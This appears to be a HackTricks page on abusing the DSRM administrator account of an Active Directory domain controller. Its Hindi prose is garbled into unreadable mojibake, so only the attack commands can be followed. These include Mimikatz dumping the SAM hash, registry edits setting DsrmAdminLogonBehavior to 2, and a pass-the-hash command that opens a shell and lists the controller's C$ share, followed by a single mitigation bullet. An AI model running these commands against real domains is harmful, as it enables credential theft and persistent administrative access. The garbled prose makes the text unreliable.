DSRM Credentials

Support HackTricks

DSRM Credentials

рд╣рд░ DC рдХреЗ рдЕрдВрджрд░ рдПрдХ рд╕реНрдерд╛рдиреАрдп рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдЦрд╛рддрд╛ рд╣реЛрддрд╛ рд╣реИред рдЗрд╕ рдорд╢реАрди рдореЗрдВ рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╣реЛрдиреЗ рдкрд░ рдЖрдк mimikatz рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рд╕реНрдерд╛рдиреАрдп рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рд╣реИрд╢ рдХреЛ рдбрдВрдк рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред рдлрд┐рд░, рдПрдХ рд░рдЬрд┐рд╕реНрдЯреНрд░реА рдХреЛ рд╕рдВрд╢реЛрдзрд┐рдд рдХрд░рдХреЗ рдЗрд╕ рдкрд╛рд╕рд╡рд░реНрдб рдХреЛ рд╕рдХреНрд░рд┐рдп рдХрд░реЗрдВ рддрд╛рдХрд┐ рдЖрдк рдЗрд╕ рд╕реНрдерд╛рдиреАрдп рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рддрдХ рджреВрд░рд╕реНрде рд░реВрдк рд╕реЗ рдкрд╣реБрдВрдЪ рд╕рдХреЗрдВред рдкрд╣рд▓реЗ рд╣рдореЗрдВ DC рдХреЗ рдЕрдВрджрд░ рд╕реНрдерд╛рдиреАрдп рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдХрд╛ рд╣реИрд╢ рдбрдВрдк рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИ:

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'

рдлрд┐рд░ рд╣рдореЗрдВ рдпрд╣ рдЬрд╛рдВрдЪрдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИ рдХрд┐ рдХреНрдпрд╛ рд╡рд╣ рдЦрд╛рддрд╛ рдХрд╛рдо рдХрд░реЗрдЧрд╛, рдФрд░ рдпрджрд┐ рд░рдЬрд┐рд╕реНрдЯреНрд░реА рдХреБрдВрдЬреА рдХрд╛ рдорд╛рди "0" рд╣реИ рдпрд╛ рдпрд╣ рдореМрдЬреВрдж рдирд╣реАрдВ рд╣реИ, рддреЛ рдЖрдкрдХреЛ рдЗрд╕реЗ "2" рдкрд░ рд╕реЗрдЯ рдХрд░рдирд╛ рд╣реЛрдЧрд╛:

Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2  #Change value to "2"

рдлрд┐рд░, PTH рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдЖрдк C$ рдХреА рд╕рд╛рдордЧреНрд░реА рд╕реВрдЪреАрдмрджреНрдз рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ рдпрд╛ рдпрд╣рд╛рдВ рддрдХ рдХрд┐ рдПрдХ рд╢реЗрд▓ рдкреНрд░рд╛рдкреНрдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред рдзреНрдпрд╛рди рджреЗрдВ рдХрд┐ рдЙрд╕ рд╣реИрд╢ рдХреЗ рд╕рд╛рде рдПрдХ рдирдпрд╛ рдкрд╛рд╡рд░рд╢реЗрд▓ рд╕рддреНрд░ рдмрдирд╛рдиреЗ рдХреЗ рд▓рд┐рдП (PTH рдХреЗ рд▓рд┐рдП) "рдбреЛрдореЗрди" рдЬреЛ рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ рд╡рд╣ рдХреЗрд╡рд▓ DC рдорд╢реАрди рдХрд╛ рдирд╛рдо рд╣реИ:

sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
#And in new spawned powershell you now can access via NTLM the content of C$
ls \\dc-host-name\C$

More info about this in: https://adsecurity.org/?p=1714 and https://adsecurity.org/?p=1785

Mitigation

  • Event ID 4657 - HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior рдХреЗ рдСрдбрд┐рдЯ рдирд┐рд░реНрдорд╛рдг/рдкрд░рд┐рд╡рд░реНрддрди

Support HackTricks

Last updated